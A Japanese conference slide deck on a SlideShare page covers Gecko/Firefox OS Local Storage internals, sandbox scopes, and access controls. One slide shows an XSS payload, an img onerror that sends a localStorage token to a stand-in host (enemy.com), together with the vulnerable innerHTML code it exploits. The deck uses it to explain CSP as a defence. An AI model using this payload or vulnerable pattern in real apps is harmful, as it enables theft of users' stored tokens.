Muneaki Nishimura, profile picture
Uploaded byMuneaki Nishimura
PDF, PPTX3,311 views

GeckoのLocal Storageについて調べてみた

2013年12月19日に開催される「FxOS Gecko勉強会 その2 」の発表資料です。 2014年6月23日、アップデートしました。

Embed presentation

Download as PDF, PPTX
GeckoのLocal Storageについて調べてみた FxOS Gecko勉強会 その2 2013.12.19 @ Mozilla Japan オフィス 2014.06.23 Updated
2 自己紹介 本発表は私の個人的な調査に基づくものです。 内容に誤りがあるかもしれませんがご了承ください 名前 西村 宗晃 (にしむねあ) ・https://www.facebook.com/muneaki.nishimura 職業 セキュリティエンジニア ・セキュア開発のコンサルティング ・Android端末~アプリの開発支援
3 Local Storageとは • HTTPクライアントに永続的なデータを保存する機能 ↔ Session Storage : セッション(ウィンドウが閉じるまで)の間だけ有効なデータを保存 • W3CのWeb Storage仕様の一部 ⁃ 元々はHTML5仕様の一部だったが、現在は独立 • key-value形式によるデータ管理 localStorage.setItem("foo","bar"); var foo = localStorage.getItem("foo"); // foo = "bar"
4 GeckoにおけるLocal Storageの実装① • Local Storageのデータは1つのSQLiteファイルに保存 ⁃ Firefoxブラウザ (Mac): ~/Library/Application Support/Firefox/Profiles/{profile}/webappsstore.sqlite ⁃ Firefox OS: /data/b2g/mozilla/{profile}/webappsstore.sqlite • webappsstore2テーブルのレコードとして保存 ⁃ 1組のkey-valueデータが1レコードに対応
5 GeckoにおけるLocal Storageの実装② scope key value secure owner moc.elpmaxe.:http:80 foo bar ※moc.elpmaxeは example.comを逆さにしたもの • scopeにより各オリジンのLocal Storageを分離 ⁃ 同一生成元ポリシー(RFC 6454)に基づくアクセス保護を実現 ⁃ Firefox OSでは、同一生成元ポリシー+サンドボックスによるアクセス保護を実現(次頁) • 例) http://example.com:80/ で foo=bar というデータを保存した場合 ⁃ scopeフィールドにデータのオリジン(スキーム+ホスト名+ポート番号)を保存
6 Firefox OSにおけるLocal Storageの保護① • Webアプリのサンドボックス ⁃ 端末内のアプリは固有のオリジン(app://)を持つ ⁃ 他のアプリのLocal Storageはアクセスできない • ブラウザAPIのサンドボックス ⁃ <iframe mozbrowser>で開かれたページはアプリと異なるサンドボックスを持つ ⁃ <iframe mozbrowser>のLocal Storageは呼び出し元のアプリから分離される
7 Firefox OSにおけるLocal Storageの保護② • これらのサンドボックスによるデータの保護はscopeで実現されている ⁃ = アプリID : Browser Contentフラグ(t/f) : ホスト名 : ポート番号 : スキーム アプリA (オリジン=app://hoge・アプリID=1005) アプリA内部のJavaScriptファイル 1005:f:egoh.:app <iframe src="http://example.com:80"> 1005:f:moc.elpmaxe.80:http <iframe src="http://example.com:80/" mozbrowser> 1005:t:moc.elpmaxe.80:http http://example.com:80 scope
8 Local Storage自体のアクセス制御① • 以下の場合はwindow.localStorageの参照が禁止される ⁃ GeckoのWeb Storage機能が無効化されている場合 ⁃ Preferenceの「dom.storage.enabled」が「false」 ⁃ Cookieの使用が無効化されている場合 ⁃ サイト別設定マネージャーの「Cookieデータの保存」が「拒否」 ⁃ Preferenceの「network.cookie.cookieBehavior」が「使用禁止(2)」 ⁃ Preferenceの「network.cookie.lifetimepolicy」が「毎回ユーザーに確認(1)」 ⁃ <iframe>にsandbox属性が適用されている場合 ⁃ ただしallow-same-originトークンが指定されていない場合のみ
9 Local Storage自体のアクセス制御② • 以下の場合はデータがストレージに保存されない(RAMにのみ保存される) ⁃ Cookieがセッションの間のみ有効である場合 ⁃ サイト別設定マネージャーの「Cookieデータの保存」が「セッション中のみ許可」 ⁃ Preferenceの「network.cookie.lifetimepolicy」が「ブラウザ終了時まで保存(2)」 ⁃ プライベートブラウジングモードで閲覧中の場合
10 アプリのLocal StorageとXSS脆弱性① • アプリにXSS脆弱性があるとLocal Storageのデータは盗み出せてしまう ⁃ CookieのようにJavaScriptからのアクセスを禁止する仕組みが無いため • Firefox OSのアプリにはXSSの保険的対策としてCSPが適用されている ⁃ しかしPrivileged AppのCSPには「unsafe-inline」が指定されているので DOMツリーにJavaScriptコードを出力しても動作してしまう (次頁参照) ⁃ Firefox OS v1.2のPrivileged Appでは「unsafe-inline」が外された模様 ⁃ XSSでLocal Storageを盗み出すのは困難になった
11 アプリのLocal StorageとXSS脆弱性② • 以下のようなコードがあるとLocal Storageのデータを盗まれてしまう var req = new XMLHttpRequest({mozSystem: true}); req.open('GET', destination, true); req.onreadystatechange = function(e) { var contact = JSON.parse(req.responseText); document.getElementById("email").innerHTML = contact.email; }; req.send(null); {"email":"<img src='d.png' onerror='document.location.href=¥"http://enemy.com? token=¥"+localStorage.getItem(¥"key¥");'>"} 脆弱なアプリのJavaScriptコード例 サーバがアプリに送るJSONデータ(攻撃コード)
12 宣伝:本を書きました「狐物語」 タイトル 狐物語 ページ数 68ページ 価格 1,000円(イベント頒布価格) 表紙 イラスト しのめり / @shino_merry デザイン siosio 目次 第一話 がいあハックス @bathtimefish 第二話 あぷりサポート @cattaka_net 第三話 すまほツイリオ @junkpot1212 第四話 もじらスライス にしむねあ 第五話 かえんワールド @meco300 URL http://techbooster-c85.appspot.com/#foxtory C85 3日目 西す24a TechBoosterにて発売

More Related Content

PDF
Firefox OS 起動の仕組みを調べてみた
byMuneaki Nishimura
 
PDF
モバイルOSとWeb標準とそれらへのアプローチ
byKisato
 
PPTX
4th tokushimaapp
byKenichi Tatsuhama
 
PDF
docxをmdで書こう
byYukimitsu Izawa
 
PPTX
ドキュメントを加速する作画ツール Blockdiag 2011/07 #infotalk
byTakeshi Komiya
 
PDF
Fx OS n2_aoitan_firefox osことはじめ
byMasami Yabushita
 
PPT
ひとりsphinx
by(^-^) togakushi
 
PDF
How to spread reST and Sphinx
byTakanori Suzuki
 
Firefox OS 起動の仕組みを調べてみた
byMuneaki Nishimura
 
モバイルOSとWeb標準とそれらへのアプローチ
byKisato
 
4th tokushimaapp
byKenichi Tatsuhama
 
docxをmdで書こう
byYukimitsu Izawa
 
ドキュメントを加速する作画ツール Blockdiag 2011/07 #infotalk
byTakeshi Komiya
 
Fx OS n2_aoitan_firefox osことはじめ
byMasami Yabushita
 
ひとりsphinx
by(^-^) togakushi
 
How to spread reST and Sphinx
byTakanori Suzuki
 

What's hot

PPTX
Sphinx GO!!
byGo Yamada
 
PDF
Cent7@zabbix2.4を試す
bymasayoshi shiraishi
 
PDF
Sphinxで社内勉強会(Git)の
資料を作ってみた
byTaku SHIMIZU
 
PDF
Sphinxを使って本を書こう #pyconjp 2012
byTakayuki Shimizukawa
 
PPTX
sphinx + blockdiag で始めるドキュメント生活 2011/05 yokohama.pm
byTakeshi Komiya
 
PPTX
BPstudy#64 ドキュメントを作りたくなってしまう魔法のツール Sphinx 2012年版
byGo Yamada
 
PPTX
手軽にメンテナンスできるドキュメントのヒミツ - blockdiag #odstudy 2011/07
byTakeshi Komiya
 
PPTX
Sphinxの使い方事例
byGo Yamada
 
PPTX
個人的ドキュメンテーションツール トップ100
byGo Yamada
 
PPTX
Sphinx ではじめるドキュメント生活 2012 #pyconjp #sphinxconjp
byTakeshi Komiya
 
PPTX
APIドキュメントの話 #sphinxjp
byTakeshi Komiya
 
PDF
社内のマニュアルをSphinxで作ってみた
byIosif Takakura
 
PPTX
ドキュメントの話、しませんか? #428rk01
byTakeshi Komiya
 
PDF
ドキュメンテーションを加速するストレスフリーの作図ツール『blockdiag』 jus2011年6月勉強会
byTakayuki Shimizukawa
 
PDF
Sphinxでまとめる多言語環境APIドキュメント
byIosif Takakura
 
PDF
Firefox で快適 WordPress 生活
bydynamis
 
PDF
Bot Framework 最新情報 2017
byYoshitaka Seo
 
PDF
Oktavia全文検索エンジン - SphinxCon JP 2014
byYoshiki Shibukawa
 
PDF
JUS関西 Sphinxワークショップ@関西 Sphinx事例紹介
bykk_Ataka
 
PDF
セキュリティ&プログラミングキャンプに行こう!
byKenta USAMI
 
Sphinx GO!!
byGo Yamada
 
Cent7@zabbix2.4を試す
bymasayoshi shiraishi
 
Sphinxで社内勉強会(Git)の
資料を作ってみた
byTaku SHIMIZU
 
Sphinxを使って本を書こう #pyconjp 2012
byTakayuki Shimizukawa
 
sphinx + blockdiag で始めるドキュメント生活 2011/05 yokohama.pm
byTakeshi Komiya
 
BPstudy#64 ドキュメントを作りたくなってしまう魔法のツール Sphinx 2012年版
byGo Yamada
 
手軽にメンテナンスできるドキュメントのヒミツ - blockdiag #odstudy 2011/07
byTakeshi Komiya
 
Sphinxの使い方事例
byGo Yamada
 
個人的ドキュメンテーションツール トップ100
byGo Yamada
 
Sphinx ではじめるドキュメント生活 2012 #pyconjp #sphinxconjp
byTakeshi Komiya
 
APIドキュメントの話 #sphinxjp
byTakeshi Komiya
 
社内のマニュアルをSphinxで作ってみた
byIosif Takakura
 
ドキュメントの話、しませんか? #428rk01
byTakeshi Komiya
 
ドキュメンテーションを加速するストレスフリーの作図ツール『blockdiag』 jus2011年6月勉強会
byTakayuki Shimizukawa
 
Sphinxでまとめる多言語環境APIドキュメント
byIosif Takakura
 
Firefox で快適 WordPress 生活
bydynamis
 
Bot Framework 最新情報 2017
byYoshitaka Seo
 
Oktavia全文検索エンジン - SphinxCon JP 2014
byYoshiki Shibukawa
 
JUS関西 Sphinxワークショップ@関西 Sphinx事例紹介
bykk_Ataka
 
セキュリティ&プログラミングキャンプに行こう!
byKenta USAMI
 

More from Muneaki Nishimura

PDF
Find Blue Oceans - Through the Competitive World of Bug Bounty
byMuneaki Nishimura
 
PDF
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
byMuneaki Nishimura
 
PDF
Firefoxの倒し方
byMuneaki Nishimura
 
PDF
Webプラットフォームのセキュリティ
byMuneaki Nishimura
 
PDF
Firefoxの日和見暗号がカジュアルに無効化された話
byMuneaki Nishimura
 
PDF
Mozillaの報奨金制度で200万円ほど稼いだ話
byMuneaki Nishimura
 
PDF
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
byMuneaki Nishimura
 
PDF
Mozillaの報奨金制度で100万円ほど稼いだ話
byMuneaki Nishimura
 
PDF
Future of Web Security Opened up by CSP
byMuneaki Nishimura
 
PDF
Welcome to the Black Hole of Bug Bounty Program Rebooted
byMuneaki Nishimura
 
PDF
そろそろ押さえておきたい AngularJSのセキュリティ
byMuneaki Nishimura
 
PDF
Welcome to the Black Hole of Bug Bounty Program
byMuneaki Nishimura
 
PDF
Webアプリ開発者のためのHTML5セキュリティ入門
byMuneaki Nishimura
 
PDF
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
byMuneaki Nishimura
 
Find Blue Oceans - Through the Competitive World of Bug Bounty
byMuneaki Nishimura
 
OWASP Testing Guide からはじめよう - セキュリティ診断技術の共有、そして横展開
byMuneaki Nishimura
 
Firefoxの倒し方
byMuneaki Nishimura
 
Webプラットフォームのセキュリティ
byMuneaki Nishimura
 
Firefoxの日和見暗号がカジュアルに無効化された話
byMuneaki Nishimura
 
Mozillaの報奨金制度で200万円ほど稼いだ話
byMuneaki Nishimura
 
HPKP Supercookies (公開鍵ピンニングによるユーザ追跡)
byMuneaki Nishimura
 
Mozillaの報奨金制度で100万円ほど稼いだ話
byMuneaki Nishimura
 
Future of Web Security Opened up by CSP
byMuneaki Nishimura
 
Welcome to the Black Hole of Bug Bounty Program Rebooted
byMuneaki Nishimura
 
そろそろ押さえておきたい AngularJSのセキュリティ
byMuneaki Nishimura
 
Welcome to the Black Hole of Bug Bounty Program
byMuneaki Nishimura
 
Webアプリ開発者のためのHTML5セキュリティ入門
byMuneaki Nishimura
 
Firefox OS パッケージ型アプリ インストールの仕組みを調べてみた
byMuneaki Nishimura
 

GeckoのLocal Storageについて調べてみた

  • 1.
    GeckoのLocal Storageについて調べてみた FxOS Gecko勉強会その2 2013.12.19 @ Mozilla Japan オフィス 2014.06.23 Updated
  • 2.
    2 自己紹介 本発表は私の個人的な調査に基づくものです。 内容に誤りがあるかもしれませんがご了承ください 名前 西村 宗晃(にしむねあ) ・https://www.facebook.com/muneaki.nishimura 職業 セキュリティエンジニア ・セキュア開発のコンサルティング ・Android端末~アプリの開発支援
  • 3.
    3 Local Storageとは • HTTPクライアントに永続的なデータを保存する機能 ↔Session Storage : セッション(ウィンドウが閉じるまで)の間だけ有効なデータを保存 • W3CのWeb Storage仕様の一部 ⁃ 元々はHTML5仕様の一部だったが、現在は独立 • key-value形式によるデータ管理 localStorage.setItem("foo","bar"); var foo = localStorage.getItem("foo"); // foo = "bar"
  • 4.
    4 GeckoにおけるLocal Storageの実装① • LocalStorageのデータは1つのSQLiteファイルに保存 ⁃ Firefoxブラウザ (Mac): ~/Library/Application Support/Firefox/Profiles/{profile}/webappsstore.sqlite ⁃ Firefox OS: /data/b2g/mozilla/{profile}/webappsstore.sqlite • webappsstore2テーブルのレコードとして保存 ⁃ 1組のkey-valueデータが1レコードに対応
  • 5.
    5 GeckoにおけるLocal Storageの実装② scope keyvalue secure owner moc.elpmaxe.:http:80 foo bar ※moc.elpmaxeは example.comを逆さにしたもの • scopeにより各オリジンのLocal Storageを分離 ⁃ 同一生成元ポリシー(RFC 6454)に基づくアクセス保護を実現 ⁃ Firefox OSでは、同一生成元ポリシー+サンドボックスによるアクセス保護を実現(次頁) • 例) http://example.com:80/ で foo=bar というデータを保存した場合 ⁃ scopeフィールドにデータのオリジン(スキーム+ホスト名+ポート番号)を保存
  • 6.
    6 Firefox OSにおけるLocal Storageの保護① •Webアプリのサンドボックス ⁃ 端末内のアプリは固有のオリジン(app://)を持つ ⁃ 他のアプリのLocal Storageはアクセスできない • ブラウザAPIのサンドボックス ⁃ <iframe mozbrowser>で開かれたページはアプリと異なるサンドボックスを持つ ⁃ <iframe mozbrowser>のLocal Storageは呼び出し元のアプリから分離される
  • 7.
    7 Firefox OSにおけるLocal Storageの保護② •これらのサンドボックスによるデータの保護はscopeで実現されている ⁃ = アプリID : Browser Contentフラグ(t/f) : ホスト名 : ポート番号 : スキーム アプリA (オリジン=app://hoge・アプリID=1005) アプリA内部のJavaScriptファイル 1005:f:egoh.:app <iframe src="http://example.com:80"> 1005:f:moc.elpmaxe.80:http <iframe src="http://example.com:80/" mozbrowser> 1005:t:moc.elpmaxe.80:http http://example.com:80 scope
  • 8.
    8 Local Storage自体のアクセス制御① • 以下の場合はwindow.localStorageの参照が禁止される ⁃GeckoのWeb Storage機能が無効化されている場合 ⁃ Preferenceの「dom.storage.enabled」が「false」 ⁃ Cookieの使用が無効化されている場合 ⁃ サイト別設定マネージャーの「Cookieデータの保存」が「拒否」 ⁃ Preferenceの「network.cookie.cookieBehavior」が「使用禁止(2)」 ⁃ Preferenceの「network.cookie.lifetimepolicy」が「毎回ユーザーに確認(1)」 ⁃ <iframe>にsandbox属性が適用されている場合 ⁃ ただしallow-same-originトークンが指定されていない場合のみ
  • 9.
    9 Local Storage自体のアクセス制御② • 以下の場合はデータがストレージに保存されない(RAMにのみ保存される) ⁃Cookieがセッションの間のみ有効である場合 ⁃ サイト別設定マネージャーの「Cookieデータの保存」が「セッション中のみ許可」 ⁃ Preferenceの「network.cookie.lifetimepolicy」が「ブラウザ終了時まで保存(2)」 ⁃ プライベートブラウジングモードで閲覧中の場合
  • 10.
    10 アプリのLocal StorageとXSS脆弱性① • アプリにXSS脆弱性があるとLocalStorageのデータは盗み出せてしまう ⁃ CookieのようにJavaScriptからのアクセスを禁止する仕組みが無いため • Firefox OSのアプリにはXSSの保険的対策としてCSPが適用されている ⁃ しかしPrivileged AppのCSPには「unsafe-inline」が指定されているので DOMツリーにJavaScriptコードを出力しても動作してしまう (次頁参照) ⁃ Firefox OS v1.2のPrivileged Appでは「unsafe-inline」が外された模様 ⁃ XSSでLocal Storageを盗み出すのは困難になった
  • 11.
    11 アプリのLocal StorageとXSS脆弱性② • 以下のようなコードがあるとLocalStorageのデータを盗まれてしまう var req = new XMLHttpRequest({mozSystem: true}); req.open('GET', destination, true); req.onreadystatechange = function(e) { var contact = JSON.parse(req.responseText); document.getElementById("email").innerHTML = contact.email; }; req.send(null); {"email":"<img src='d.png' onerror='document.location.href=¥"http://enemy.com? token=¥"+localStorage.getItem(¥"key¥");'>"} 脆弱なアプリのJavaScriptコード例 サーバがアプリに送るJSONデータ(攻撃コード)
  • 12.
    12 宣伝:本を書きました「狐物語」 タイトル 狐物語 ページ数 68ページ 価格1,000円(イベント頒布価格) 表紙 イラスト しのめり / @shino_merry デザイン siosio 目次 第一話 がいあハックス @bathtimefish 第二話 あぷりサポート @cattaka_net 第三話 すまほツイリオ @junkpot1212 第四話 もじらスライス にしむねあ 第五話 かえんワールド @meco300 URL http://techbooster-c85.appspot.com/#foxtory C85 3日目 西す24a TechBoosterにて発売